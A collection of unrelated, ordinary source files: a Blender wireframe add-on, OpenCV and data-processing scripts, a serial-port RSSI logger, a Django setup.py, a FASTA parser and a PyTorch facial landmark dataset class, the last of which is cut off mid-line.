= {'slider_wt_freestyle': context.scene.cwac.slider_wt_freestyle,\n 'slider_wt_modifier': context.scene.cwac.slider_wt_modifier}\n\n config['LAYERS SELECTED'] = {'layers_affected': list(context.scene.cwac.layers_affected),\n 'layers_other': list(context.scene.cwac.layers_other)}\n\n config['SCENE NAME SET'] = {'scene_name_1': context.scene.cwac.scene_name_1}\n\n with open(filepath, 'w') as configfile:\n config.write(configfile)\n\n\ndef set_up_wireframe_freestyle():\n \"\"\"Sets up the complete wireframe using the freestyle setup.\"\"\"\n\n # creates wireframe scene\n wire_scene = BlenderSceneW(w_var.original_scene, w_var.cb_backup, w_var.scene_name_1, 'CYCLES')\n\n # sets all used objects to three sets: affected objects, other object and all used objects\n # (need to do after I copy the scene to get the objects from the copied scene)\n wire_scene.add_objects_used()\n\n # updates progress bar to 25 %\n bpy.context.window_manager.progress_update(25)\n\n if not w_var.cb_clay_only:\n\n # sets up renderlayer(s) (depending on 'Composited wireframing' checkbox) and freestyle wireframing\n # also saves freestyle linestyle name\n wire_scene.set_up_rlayer('wireframe', rlname_other='other')\n wire_scene.get_scene().cwac.data_freestyle_linestyle = wire_scene.add_wireframe_freestyle().name\n\n else:\n # sets up renderlayer named 'clay' instead of 'wireframe'\n wire_scene.set_up_rlayer('clay')\n\n # updates progress bar to 50 %\n bpy.context.window_manager.progress_update(50)\n\n if w_var.cb_clear_materials:\n\n # removes all materials from affected meshes\n wire_scene.select('SELECT', {'MESH'}, objects_excluded={'ELSE'})\n wire_scene.clear_materials_on_selected()\n\n # updates progress bar to 75 %\n bpy.context.window_manager.progress_update(75)\n\n if w_var.cb_clay:\n\n # adds clay material to affected meshes and saves material name\n wire_scene.select('SELECT', {'MESH'}, objects_excluded={'ELSE'})\n wire_scene.get_scene().cwac.data_material_clay = wire_scene.add_clay_to_selected().name\n\n # updates progress bar to 99 %\n bpy.context.window_manager.progress_update(99)\n\n if w_var.cb_ao and not w_var.cb_composited:\n\n # sets up ambient occlusion lighting\n wire_scene.comp_add_ao()\n wire_scene.set_up_world_ao()\n\n elif w_var.cb_composited:\n\n # sets up composition for wireframe and sets up ambient occlusion lighting if used\n wire_scene.comp_add_wireframe_freestyle()\n bpy.data.scenes[wire_scene.name].cycles.film_transparent = True\n\n if w_var.cb_ao:\n wire_scene.set_up_world_ao()\n\n # deselects all objects as a last thing to clean up\n wire_scene.select('DESELECT', objects={'ALL'})\n\n\ndef set_up_wireframe_modifier():\n \"\"\"Sets up the complete wireframe using the modifier setup.\n\n If the mesh(es) you apply this to have several materials each and you don't use clay, the material of the\n wireframe will not be the expected one as it depends on the material offset set in the wireframe modifier.\n \"\"\"\n\n # creates wireframe scene\n wire_scene = BlenderSceneW(w_var.original_scene, w_var.cb_backup, w_var.scene_name_1, 'CYCLES')\n\n # sets all used objects to three sets: affected objects, other object and all used objects\n # (need to do after I copy the scene to get the objects from the copied scene)\n wire_scene.add_objects_used()\n\n # updates progress bar to 25 %\n bpy.context.window_manager.progress_update(25)\n\n if w_var.cb_clear_materials:\n\n # removes all materials from affected meshes\n wire_scene.select('SELECT', {'MESH'}, objects_excluded={'ELSE'})\n wire_scene.clear_materials_on_selected()\n\n # updates progress bar to 50 %\n bpy.context.window_manager.progress_update(50)\n\n if w_var.cb_clay:\n\n # adds clay material to affected meshes and saves material name\n # (need to add clay material before wireframe material for material offset in wireframe modifier to be correct)\n wire_scene.select('SELECT', {'MESH'}, objects_excluded={'ELSE'})\n wire_scene.get_scene().cwac.data_material_clay = wire_scene.add_clay_to_selected().name\n\n # updates progress bar to 75 %\n bpy.context.window_manager.progress_update(75)\n\n if not w_var.cb_clay_only:\n\n # sets up renderlayer and adds wireframe modifier/material to affected meshes and saves wireframe material\n wire_scene.set_up_rlayer('wireframe')\n wire_scene.get_scene().cwac.data_material_wire = wire_scene.add_wireframe_modifier().name\n\n else:\n\n # sets up renderlayer named 'clay' instead of 'wireframe'\n wire_scene.set_up_rlayer('clay')\n\n # updates progress bar to 99 %\n bpy.context.window_manager.progress_update(99)\n\n if w_var.cb_ao:\n\n # sets up ambient occlusion lighting\n wire_scene.set_up_world_ao()\n wire_scene.comp_add_ao()\n\n # deselects all objects as a last thing to clean up\n wire_scene.select('DESELECT', objects={'ALL'})\n", "sub_path": "scripts/addons_extern/blender-CyclesWireframeAndClay-master/w_tools.py", "file_name": "w_tools.py", "file_ext": "py", "file_size_in_byte": 14484, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bpy.context", "line_number": 20, "usage_type": "attribute"}, {"api_name": "w_b_scene.BlenderSceneW", "line_number": 114, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 149, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 195, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 199, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 224, "usage_type": "call"}, {"api_name": "w_b_scene.BlenderSceneW", "line_number": 261, "usage_type": "call"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 268, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 268, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 282, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 282, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 291, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 291, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 300, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 300, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 312, "usage_type": "attribute"}, {"api_name": "w_b_scene.BlenderSceneW", "line_number": 329, "usage_type": "call"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 336, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 336, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 345, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 345, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 355, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 355, "usage_type": "attribute"}, {"api_name": "bpy.context.window_manager.progress_update", "line_number": 369, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 369, "usage_type": "attribute"}]} +{"seq_id": "534983138", "text": "import cv2 as cv\r\nimport numpy as np\r\n\r\nimg = cv.imread(\"C:\\\\Users\\\\tjt\\\\Desktop\\\\1.jpg\")\r\nimg2 = cv.imread(\"C:\\\\Users\\\\tjt\\\\Desktop\\\\2.jpg\")#读取图片,为BGR模式,不是RGB\r\nimg_ = img2[0:img.shape[0],0:img.shape[1]] \r\nprint(img) #打印图片的长宽和通道数组成的元组\r\ncv.imshow(\"img\",img)\r\n\r\nsource = cv.split(img) #拆分通道,返回列表\r\nprint(type(source))\r\n\r\ng = img[:,:,1] #截取整个绿色通道\r\ncv.imshow(\"g\",g)\r\n\r\nimg_black = np.zeros(img.shape[0:2],dtype = np.uint8) #设置img1的size与img相等,单通道,且初始像素值为0\r\nimg_black[100:200,100:200] = 255 #设置区域内的像素值 \r\ncv.imshow(\"img_black\",img_black)\r\n\r\nimg_add = cv.add(img,img_,mask=img_black) #两个同大小单通道的图像像素值相加,mask为掩膜\r\ncv.imshow(\"img_add\",img_add)\r\n\r\nimg_blend = cv.addWeighted(img,0.5,img_,0.1,0) #addWeighted(img1,权重1,img2,权重2,常数),img1*权重1+img2*权重2+常数\r\ncv.imshow(\"img_blend\",img_blend)\r\n\r\n\r\nimg_and = cv.bitwise_and(img,img_) #按位和运算\r\nimg_or = cv.bitwise_or(img,img_) #按位或运算\r\nimg_not = cv.bitwise_not(img) #按位非运算\r\ncv.imshow(\"ig_and\",img_and)\r\n\r\nlower = np.array([10,20,30])\r\nupper = np.array([200,210,250])\r\nimg_mask = cv.inRange(img,lower,upper) #两个像素值组成一个范围,img中所有大于最大值和小于最小值的点变为0,处于范围内的点变为255\r\ncv.imshow(\"img_mask\",img_mask) #而对于多通道,必须每个通道值都要满足条件\r\n\r\nimg_hsv = cv.cvtColor(img,cv.COLOR_BGR2HSV)\r\ncv.imshow(\"img_hsv\",img_hsv)\r\n\r\nkey = cv.waitKey(0)\r\n\r\n\r\n", "sub_path": "opencv_test.py", "file_name": "opencv_test.py", "file_ext": "py", "file_size_in_byte": 1630, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.add", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.bitwise_or", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "631140203", "text": "import xml.etree.ElementTree as ET\n\ntree = ET.parse('tables')\nroot = tree.getroot()\n\nwith open('tree.html', 'w') as f:\n f.write(\"\")", "sub_path": "queryUI/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 609, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 3, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "461405209", "text": "import pandas as pd\r\nfrom datetime import datetime, timedelta\r\nfrom env.inventory_utils import Utils\r\nimport global_config\r\nimport numpy as np\r\npd.options.mode.chained_assignment = None\r\nclass BaseSaleAdapter(object):\r\n\r\n def __init__(self, config):\r\n self.config = config\r\n self.dt_col = self.config['dt_col']\r\n self.dt_format = self.config['dt_format']\r\n self.sale_col = self.config['sale_col']\r\n self.id_col = self.config['id_col']\r\n self.sale_price_col = self.config['sale_price_col']\r\n self.file_format = self.config.get('file_format', 'CSV')\r\n self.encoding = self.config.get('encoding', 'utf-8')\r\n self.file_loc = self.config['file_loc']\r\n self.sale_mean_col = self.config['sale_mean_col']\r\n self.sale_ts_cache = dict()\r\n self.sale_price_ts_cache = dict()\r\n self.sale_mean = dict()\r\n self.sale_price_mean = dict()\r\n self.date_cache = dict()\r\n\r\n self.total_span = 0\r\n self.cache_data()\r\n\r\n def _transfer_to_daily_sale(self):\r\n pass\r\n\r\n def _transfer_to_original_sale(self):\r\n pass\r\n\r\n def sample_sale_and_price(self, id_val, gap):\r\n # if gap>=225: print(id_val, gap, self.sale_ts_cache[id_val][gap], self.sale_price_ts_cache[id_val][gap])\r\n\r\n # if global_config.random_noise == 'dense':\r\n # demand_noise = 2 * np.random.random() - 1\r\n # demand_noise = 0.2 * demand_noise * self.sale_mean[id_val]\r\n # demand = max(0, int(self.sale_ts_cache[id_val][gap] + demand_noise))\r\n # # print(\"dense noise! \", id_val, self.sale_mean[id_val], demand_noise, demand)\r\n # elif global_config.random_noise == 'sparse':\r\n # demand = self.sale_ts_cache[id_val][gap]\r\n # # print(\"sparse noise \")\r\n # if np.random.random() < 0.1:\r\n # demand = np.random.chisquare(2*self.sale_mean[id_val])\r\n # # print(f\"use sparse noise, origin {self.sale_ts_cache[id_val][gap]}, now {demand}, sale mean {self.sale_mean[id_val]}\")\r\n # else:\r\n # # print(\"no noise! \")\r\n # demand = self.sale_ts_cache[id_val][gap]\r\n demand = self.sale_ts_cache[id_val][gap]\r\n return (demand, self.sale_price_ts_cache[id_val][gap])\r\n\r\n def get_date_info(self, id_val, gap):\r\n date = self.date_cache[id_val][gap]\r\n date_info = {\r\n \"isoweekday\": date.isoweekday(),\r\n \"year\": date.year,\r\n \"month\": date.month,\r\n \"day\": date.day,\r\n \"dayofyear\": date.dayofyear,\r\n \"isweekend\": date.isoweekday() >= 6,\r\n }\r\n return date_info\r\n\r\n def get_sale_mean(self, id_val):\r\n return self.sale_mean[id_val]\r\n\r\n def cache_data(self):\r\n self.df = self._read_df()\r\n self._transfer_to_daily_sale()\r\n # id_list = self.df[self.id_col].unique().tolist()\r\n id_list = Utils.get_all_skus()\r\n dt_min, dt_max = self.df[self.dt_col].min(), self.df[self.dt_col].max()\r\n self.total_span = (dt_max - dt_min).days + 1\r\n\r\n for id_val in id_list:\r\n df_tmp = self.df[self.df[self.id_col] == id_val]\r\n df_tmp[f\"{self.dt_col}_str\"] = df_tmp[self.dt_col].map(lambda x: x.strftime(self.dt_format))\r\n sale_cache_tmp = df_tmp.set_index(f\"{self.dt_col}_str\").to_dict('dict')[self.sale_col]\r\n sale_price_cache_tmp = df_tmp.set_index(f\"{self.dt_col}_str\").to_dict('dict')[self.sale_price_col]\r\n date_cache_tmp = df_tmp.set_index(f\"{self.dt_col}_str\").to_dict('dict')[self.dt_col]\r\n dt_tmp = dt_min\r\n self.sale_ts_cache[id_val] = []\r\n self.sale_price_ts_cache[id_val] = []\r\n self.date_cache[id_val] = []\r\n self.sale_mean[id_val] = df_tmp[self.sale_col].mean()\r\n sale_price_mean = df_tmp[self.sale_price_col].mean()\r\n while dt_tmp <= dt_max:\r\n dt_tmp_str = datetime.strftime(dt_tmp, self.dt_format)\r\n if sale_cache_tmp.get(dt_tmp_str) == None:\r\n print(f\"this day is lose in dataset: {dt_tmp_str}\")\r\n #print(f\"press any key to continue ...\")\r\n #input()\r\n self.sale_ts_cache[id_val].append(sale_cache_tmp.get(dt_tmp_str, 0))\r\n self.sale_price_ts_cache[id_val].append(sale_price_cache_tmp.get(dt_tmp_str, sale_price_mean))\r\n self.date_cache[id_val].append(date_cache_tmp.get(dt_tmp_str, dt_tmp))\r\n dt_tmp = dt_tmp + timedelta(days=1)\r\n #if sale_cache_tmp.get(dt_tmp_str) == None:\r\n # print(dt_tmp)\r\n # print(self.date_cache[id_val][-1]p)\r\n\r\n def _read_df(self):\r\n if self.file_format == 'CSV':\r\n self.df = pd.read_csv(self.file_loc, encoding=self.encoding, parse_dates=[self.dt_col])\r\n elif self.file_format == 'EXCEL':\r\n self.df = pd.read_excel(self.file_loc, encoding=self.encoding, parse_dates=[self.dt_col])\r\n else:\r\n raise BaseException('Not Implemented')\r\n return self.df", "sub_path": "RLPolicy/data_adapter/base_sale_adapter.py", "file_name": "base_sale_adapter.py", "file_ext": "py", "file_size_in_byte": 5140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.options", "line_number": 6, "usage_type": "attribute"}, {"api_name": "env.inventory_utils.Utils.get_all_skus", "line_number": 74, "usage_type": "call"}, {"api_name": "env.inventory_utils.Utils", "line_number": 74, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 91, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "121287571", "text": "#%%\n# -*- coding: utf-8 -*-\n\n# Offsets:\n# Hallway: 92cm\n# Railing: 192cm\n# Basement: 25cm\n\nimport re\nimport serial\nimport os\nimport csv\nimport time\n\noutput_filepath = r'C:\\Users\\jgamm\\Desktop\\rssi_measurement\\2020-06-23\\data\\basement\\side_blocked'\noutput_filename = r'3.00.csv'\nI_COM = r'COM11'\nR_COM = r'COM12'\nNUM_TRIALS = 50\n\nData = {'time_since_start': [],\n 'time_taken': [],\n 'conn_idx': [],\n 'distance': [],\n 'avg_distance': [],\n 'event': [],\n 'fo_i': [],\n 'fo_r': [],\n 'agc_i': [],\n 'agc_r': [],\n 'dqf': [],\n 'ia_i': [],\n 'ia_r': [],\n 'i_rssi': [],\n 'r_rssi': []}\n\nI = serial.Serial(port=I_COM,\n baudrate=9600,\n parity=serial.PARITY_NONE,\n bytesize=serial.EIGHTBITS,\n stopbits=serial.STOPBITS_ONE)\nR = serial.Serial(port=R_COM,\n baudrate=9600,\n parity=serial.PARITY_NONE,\n bytesize=serial.EIGHTBITS,\n stopbits=serial.STOPBITS_ONE)\n\ntry:\n I.flush()\n R.flush()\n trial = 0\n start_time = time.time()\n while True:\n while I.read() != b'M':\n pass # Wait for beginning of a transmission\n if I.read()+I.read()+I.read()+I.read()+I.read() != b'easur':\n print('Skipping a measurement')\n continue\n i_output = (I.readline()+I.readline()+I.readline())\n i_output = i_output.decode('ascii')\n if 'distance: inf' in i_output: # Skip invalid measurements\n continue\n if not ('dqf: 100' in i_output): # Skip low-quality measurements\n continue\n output = re.findall(r'[-+]?\\d*\\.\\d+|[-+]?\\d+', i_output)\n assert len(output) == 14\n Data['time_since_start'].append(int(1000*(time.time()-start_time)))\n Data['time_taken'].append(int(output[0]))\n Data['conn_idx'].append(int(output[1]))\n Data['distance'].append(float(output[2]))\n Data['avg_distance'].append(float(output[3]))\n Data['event'].append(int(output[4]))\n Data['fo_i'].append(int(output[5]))\n Data['fo_r'].append(int(output[6]))\n Data['agc_i'].append(int(output[7]))\n Data['agc_r'].append(int(output[8]))\n Data['dqf'].append(int(output[9]))\n Data['ia_i'].append(int(output[10]))\n Data['ia_r'].append(int(output[11]))\n Data['i_rssi'].append(int(output[12]))\n Data['r_rssi'].append(int(output[13]))\n trial += 1\n if trial == NUM_TRIALS:\n break\nfinally:\n I.close()\n R.close()\n\nwith open(os.path.join(output_filepath, output_filename), 'w', newline='') as F:\n writer = csv.writer(F, delimiter=',')\n writer.writerow([index for index in Data])\n for trial in range(NUM_TRIALS):\n writer.writerow([Data[index][trial] for index in Data])\n \n ", "sub_path": "data/JimmyGammell/2020-06-23/code/take_data.py", "file_name": "take_data.py", "file_ext": "py", "file_size_in_byte": 2889, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "serial.Serial", "line_number": 37, "usage_type": "call"}, {"api_name": "serial.PARITY_NONE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 40, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 42, "usage_type": "call"}, {"api_name": "serial.PARITY_NONE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 52, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 65, "usage_type": "call"}, {"api_name": "time.time", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "286136326", "text": "import os\nfrom setuptools import setup, find_packages\nfrom dual_sessions import __version__\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-dual-sessions',\n version=__version__,\n packages=find_packages(),\n include_package_data=True,\n license='MIT License',\n description='Manage your Django sessions differently for authenticated and unauthenticated users - with minimal configuration '\n 'required.',\n long_description=README,\n url='https://github.com/Aristotle-Metadata-Enterprises/',\n author='Aristotle Cloud Services Australia',\n author_email='hello@aristotlemetadata.com',\n classifiers=[\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n keywords='django sessions management',\n install_requires=[\n 'django', # I mean obviously you'll have django installed if you want to use this.\n ],\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1278, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 9, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 11, "usage_type": "call"}, {"api_name": "dual_sessions.__version__", "line_number": 13, "usage_type": "name"}, {"api_name": "setuptools.find_packages", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "91480174", "text": "import os\nimport unittest\nfrom common import HTMLTestRunner\nimport getpathInfo\n\n\n# 定义测试用例的目录为当前目录,跑所有的用例\npath = getpathInfo.get_Path()\ntest_dir = os.path.join(path, 'testCase')\nreport_dir = os.path.join(path, 'result')\ndiscover = unittest.defaultTestLoader.discover(test_dir, pattern='test_*.py', top_level_dir=None)\n\n\ndef run():\n print(discover)\n # 定义报告存放路径\n filename = os.path.join(report_dir, \"report.html\")\n\n fp = open(filename, \"wb\")\n # 定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title='Test Report', description='OSS-CORE 接口测试报告')\n # 运行测试\n runner.run(discover)\n # 关闭报告文件\n fp.close()\n\n\nif __name__ == \"__main__\":\n run()\n", "sub_path": "runAll.py", "file_name": "runAll.py", "file_ext": "py", "file_size_in_byte": 774, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "getpathInfo.get_Path", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "unittest.defaultTestLoader.discover", "line_number": 11, "usage_type": "call"}, {"api_name": "unittest.defaultTestLoader", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "common.HTMLTestRunner.HTMLTestRunner", "line_number": 21, "usage_type": "call"}, {"api_name": "common.HTMLTestRunner", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "254297633", "text": "#!/usr/bin/env python3\n\"\"\"\nYH ~ 20.6.2018\n[chain_nr_identity.py] \nFor each protein in a file of fasta sequences, reports the number of chains per\nprotein, the number of identical chains, and the chains IDs of the identical chains\nInput: combined.fasta file\nOutput: chain_identity.dat file\n\nImprovements - does not work on files with empty sequence entries \n\"\"\"\n#################################### IMPORTS ###################################\nfrom sys import argv\nimport itertools\nimport json\n################################### FUNCTIONS ##################################\n\ndef fasta_parser(inputfile):\n \"\"\"\n Returns three lists, one of sequence IDs, one of sequences, one of sequence lengths,\n in the order read in file\n Input argument = inputfile (a FASTA file)\n Returns seq_list; list of sequences, seq_lengths; list of sequence lengths \n \"\"\"\n seq_ids = [] \n seq_list = []\n seq_lengths = []\n seq = []\n\n for line in inputfile:\n if not line.strip():\n continue\n if line.startswith('>'):\n seq_ids.append(line.strip().split('>')[1:])\n if seq:\n seqstr = \"\".join(seq)\n seq_list.append(seqstr)\n seq = []\n else:\n seq.append(line.strip())\n\n\n seqstr = \"\".join(seq)\n seq_list.append(seqstr)\n \n for sequence in seq_list:\n seq_lengths.append(len(sequence))\n\n seq_ids = list(itertools.chain.from_iterable(seq_ids))\n\n return seq_ids, seq_list, seq_lengths\n\ndef print_output(protdict, unequalchains):\n \"\"\"\n \"\"\"\n protdict = list(protdict.items())\n unequalchains = list(set(unequalchains))\n\n chainnrfile = open('numberofchains.txt', 'w+')\n for i in range(len(protdict)):\n chainnrfile.write('{}\\t{}'.format(protdict[i][0], protdict[i][1]))\n if i != len(protdict):\n chainnrfile.write('\\n')\n chainnrfile.close()\n\n problemsfile = open('unequalchains.txt', 'w+')\n for i in range(len(unequalchains)):\n problemsfile.write('{}'.format(unequalchains[i]))\n if i != len(unequalchains):\n problemsfile.write('\\n')\n problemsfile.close()\n\n#################################### MAIN ######################################\nif __name__ == \"__main__\":\n\n # parse fasta file to get IDs, sequences, and their lengths \n SeqIDs, Sequences, SeqLengths = fasta_parser(open(argv[1]))\n\n # produces a dictionary of unique proteins and then number of chains in PDB\n # also produces a list of proteins with chains that don't match\n count = 1\n ProtDict = {SeqIDs[0][0:4]:count}\n Unequal_chains = []\n\n for i in range(len(SeqIDs)-1):\n uniq_id = SeqIDs[i][0:4]\n new_id = SeqIDs[i+1][0:4]\n\n if new_id == uniq_id:\n count = count + 1\n ProtDict[uniq_id] = count\n if Sequences[i] != Sequences[i+1]:\n Unequal_chains.append(new_id)\n else:\n count = 1\n ProtDict[new_id] = count\n\n # save output in an analysis file\n print_output(ProtDict, Unequal_chains)\n", "sub_path": "chain_nr_identity.py", "file_name": "chain_nr_identity.py", "file_ext": "py", "file_size_in_byte": 3072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "itertools.chain.from_iterable", "line_number": 49, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "127835952", "text": "# ------------------------------------------------------------------------------\n# Copyright (c) Microsoft\n# Licensed under the MIT License.\n# Created by Tianheng Cheng(tianhengcheng@gmail.com), Yang Zhao\n# ------------------------------------------------------------------------------\n\nimport os\nimport random\n\nimport torch\nimport torch.utils.data as data\nimport pandas as pd\nfrom PIL import Image, ImageFile\nimport numpy as np\n\nfrom ..utils.transforms import fliplr_joints, crop, generate_target, transform_pixel\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n\nclass AFLW(data.Dataset):\n \"\"\"AFLW\n \"\"\"\n def __init__(self, cfg, is_train=True, transform=None):\n # specify annotation file for dataset\n if is_train:\n self.csv_file = cfg.DATASET.TRAINSET\n else:\n self.csv_file = cfg.DATASET.TESTSET\n\n self.is_train = is_train\n self.transform = transform\n self.data_root = cfg.DATASET.ROOT\n self.input_size = cfg.MODEL.IMAGE_SIZE\n self.output_size = cfg.MODEL.HEATMAP_SIZE\n self.sigma = cfg.MODEL.SIGMA\n self.scale_factor = cfg.DATASET.SCALE_FACTOR\n\n #rot_factor 是什么 (旋转角度)\n self.rot_factor = cfg.DATASET.ROT_FACTOR\n self.label_type = cfg.MODEL.TARGET_TYPE\n self.flip = cfg.DATASET.FLIP\n self.mean = np.array([0.485, 0.456, 0.406], dtype=np.float32)\n self.std = np.array([0.229, 0.224, 0.225], dtype=np.float32)\n # load annotations\n self.landmarks_frame = pd.read_csv(self.csv_file)\n\n def __len__(self):\n return len(self.landmarks_frame)\n\n def __getitem__(self, idx):\n #idx 为图片索引\n\n image_path = os.path.join(self.data_root,\n self.landmarks_frame.iloc[idx, 0])\n scale = self.landmarks_frame.iloc[idx, 1]\n box_size = self.landmarks_frame.iloc[idx, 2]\n\n center_w = self.landmarks_frame.iloc[idx, 3]\n center_h = self.landmarks_frame.iloc[idx, 4]\n center = torch.Tensor([center_w, center_h])\n\n pts = self.landmarks_frame.iloc[idx, 5:].values\n ##pts为所有Landmark的坐标点 shape (19,2)\n pts = pts.astype('float').reshape(-1, 2)\n\n\n scale *= 1.25\n nparts = pts.shape[0] #Landmark的数量\n img = np.array(Image.open(image_path).convert('RGB'), dtype=np.float32)\n\n\n r = 0\n if self.is_train:\n #scale 会影响什么部分?\n scale = scale * (random.uniform(1 - self.scale_factor,\n 1 + self.scale_factor))\n\n ##图像增强中的旋转和翻转\n r = random.uniform(-self.rot_factor, self.rot_factor) \\\n if random.random() <= 0.6 else 0\n if random.random() <= 0.5 and self.flip:\n img = np.fliplr(img)\n pts = fliplr_joints(pts, width=img.shape[1], dataset='AFLW')\n center[0] = img.shape[1] - center[0]\n\n #图像根据上述增强进行变化\n img = crop(img, center, scale, self.input_size, rot=r)\n\n target = np.zeros((nparts, self.output_size[0], self.output_size[1]))\n ##target 为生成的HeatMap shape:19 x 64 x 